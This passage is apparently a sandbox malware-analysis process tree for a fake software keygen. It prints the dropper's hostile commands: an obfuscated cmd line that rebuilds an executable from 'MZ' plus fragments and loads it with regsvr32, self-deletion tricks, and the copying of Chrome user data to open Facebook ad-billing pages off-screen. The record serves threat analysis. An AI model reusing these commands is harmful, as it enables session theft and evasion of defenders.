                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:5796
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.zip\Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.zip\Sage.Frp.Treasury.3.22.01.03.serial.number.keygen.by.ACME.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:5916
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:6036
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6088
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1148
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5516
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                              keygen-step-1.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6108
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                              keygen-step-5.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4156
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\system32\cmd.exe" /q/c copY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ikWAmmoO.exe > NuL && sTaRT ikWAmmoO.exe /PBFgM5YfESkcrdT0TH7go8wAsk & IF "" =="" for %C IN ("C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /IM "%~NXC" /f> Nul
                                                                                                                                                4⤵
                                                                                                                                                  PID:5108
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ikWAmmoO.exe
                                                                                                                                                    ikWAmmoO.exe /PBFgM5YfESkcrdT0TH7go8wAsk
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3240
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /q/c copY /y "C:\Users\Admin\AppData\Local\Temp\ikWAmmoO.exe" ikWAmmoO.exe > NuL && sTaRT ikWAmmoO.exe /PBFgM5YfESkcrdT0TH7go8wAsk & IF "/PBFgM5YfESkcrdT0TH7go8wAsk " =="" for %C IN ("C:\Users\Admin\AppData\Local\Temp\ikWAmmoO.exe" ) do taskkill /IM "%~NXC" /f> Nul
                                                                                                                                                      6⤵
                                                                                                                                                        PID:5160
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C echO | SeT /p = "MZ" > CCCW_Us.YOE &cOPy /B /Y CCCW_us.YOE + TkCqJV.CvJ +b7K~_K._ + 6~1V061.BQT + OXLB~.aZ SQHJc.II > nuL& Del TkCQJV.CVJ B7K~_K._ 6~1V061.BqT OXLB~.az CCCW_US.YOE > nUL& stArt regsvr32.exe /U /S .\SqHJC.Ii
                                                                                                                                                        6⤵
                                                                                                                                                          PID:5388
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>CCCW_Us.YOE"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5428
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echO "
                                                                                                                                                              7⤵
                                                                                                                                                                PID:5416
                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                regsvr32.exe /U /S .\SqHJC.Ii
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                PID:2664
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /IM "keygen-step-5.exe" /f
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:3696
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                        keygen-step-2.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        PID:4280
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\EB5F.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\EB5F.tmp.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:860
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\EB5F.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4536
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                6⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:3696
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3236
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:1540
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                            keygen-step-3.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:692
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5212
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:5396
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                              keygen-step-4.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5424
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:4392
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5536
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:1572
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:4948
                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    PID:5152
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:6060
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff9e84d4f50,0x7ff9e84d4f60,0x7ff9e84d4f70
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:6068
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1604 /prefetch:2
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:4260
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1664 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:5388
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2116 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5140
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5212
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:3524
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6120
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4700
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5772
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2256
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5716 /prefetch:8
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:3932
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5548 /prefetch:8
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:4188
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1572 /prefetch:8
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:5584
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1428 /prefetch:8
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4008
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5692 /prefetch:8
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5936
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1696 /prefetch:8
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:4788
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3108 /prefetch:2
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4728
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2984 /prefetch:8
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:3600
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2428 /prefetch:8
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4152
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5692 /prefetch:8
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:4332
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4020 /prefetch:8
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:3260
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4128 /prefetch:8
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:2544
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4156 /prefetch:8
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:5152
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\SwReporter\90.260.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=XF75SfCVGXftAZbN4Pwn+OwSv8zzRzUSXZc4HXK9 --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          PID:4572
                                                                                                                                                                                                          • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                            c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=90.260.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff62f35a808,0x7ff62f35a818,0x7ff62f35a828
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:4696
                                                                                                                                                                                                          • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                            "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4572_YDRVMMYSQIQPPYGN" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=862065778637744515 --mojo-platform-channel-handle=692 --engine=2
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:3332
                                                                                                                                                                                                          • \??\c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe
                                                                                                                                                                                                            "c:\users\admin\appdata\local\temp\cghjgasaaz99\swreporter\90.260.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4572_YDRVMMYSQIQPPYGN" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=13345915432087713084 --mojo-platform-channel-handle=912
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:5076
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5168 /prefetch:8
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          PID:2656
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5044 /prefetch:8
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:5696
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5108 /prefetch:8
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:5888
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5324 /prefetch:8
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:4672
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5236 /prefetch:8
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:2080
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,9944291858798378710,11037992401492044696,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4056 /prefetch:8
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:5856
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
